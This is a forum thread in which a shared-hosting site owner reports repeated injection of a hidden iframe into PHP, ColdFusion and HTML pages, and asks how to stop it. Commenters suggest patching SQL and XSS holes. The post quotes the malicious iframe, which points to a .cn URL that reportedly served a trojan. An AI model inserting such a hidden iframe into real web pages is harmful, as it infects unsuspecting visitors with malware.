Your Server

MYSQL security issue - need advice?

I am on a godaddy server, shared, and they won't fix it, so I am asking someone hear for advice or a solution before getting my own dedicated server as a last resort. My sites were getting hacked about two months ago using an iframe code that went to a .cn site and apparently downloaded a trojan to the users machine. Well i cleaned up all my sites as it infected php, coldfusion, html files all the same with this little line of code on the end of each page. I changed all my passwords to ones using letters, numbers, symbols etc to avoid possible cracking. The code was and still is: < iframe src="http://liteautotop.cn/ts/in.cgi?mozila" width=1 height=1 style="visibility: hidden">< / iframe > (spaced out to avoid a problem here) Now two months later it's back, same issue, downloading a trojan to users machine. I am deleting the two sites that are having this issue at present only these two are, however I am tired of deleting and restoring databases every few months or more due to this obvious exploit. Need direction on what to do to secure the server from my end since it is on a shared server can I do anything without converting to a virtual or dedicated one? If you can lead me in the right direction of avoiding this type of attack yet again I would appreciate it. Only suggestion I gotten thus far is to 1- delete all website files like HTML, php and so forth (pdf, images, css files seem to be fine) and remove and reinstall databases. 2- get either a dedicated or virtual dedicated server so you can install a firewall on it to help protect it from such attacks. If by chance someone did download something onto their machine, your customers or visitors for example the best virus software I have found is Trend Micro. I had to do a clean install on my own system since it was quicker than fighting the trojan that was infecting my machine after visiting one of my sites. UPDATE I have since said screw godaddy for hosting and purchased a virtual dedicated server so I have more control over stuff such as this as well as installed software to block as much of this as possible. I purchased a nice package for $20 a month at infinitie.net, they have a special running on eBay, just search virtual server on ebay and their username was edealzdirect ... I am not promoting this seller, just a reference to it and what you can do besides waiting on godaddy to do nothing in the end.

Public Comments

1. I am in the same boat. got this issue for my sites like desipeoria.com etc in the last week. Not sure what these guys are upto...please let me know if you see any solutions...I will do the same...my email - chinta_ramesh AT hotmail.com
2. That sucks =( . You will need to figure out exactly where the flaw is in the code that allows this injection. Update all your scripts, and fix the code if you coded it yourself. Do not allow anything that doesn't need to be allowed. Somewhere someone is getting in to your code (possibly through a SQL or XSS injection). Fix the vulnerability.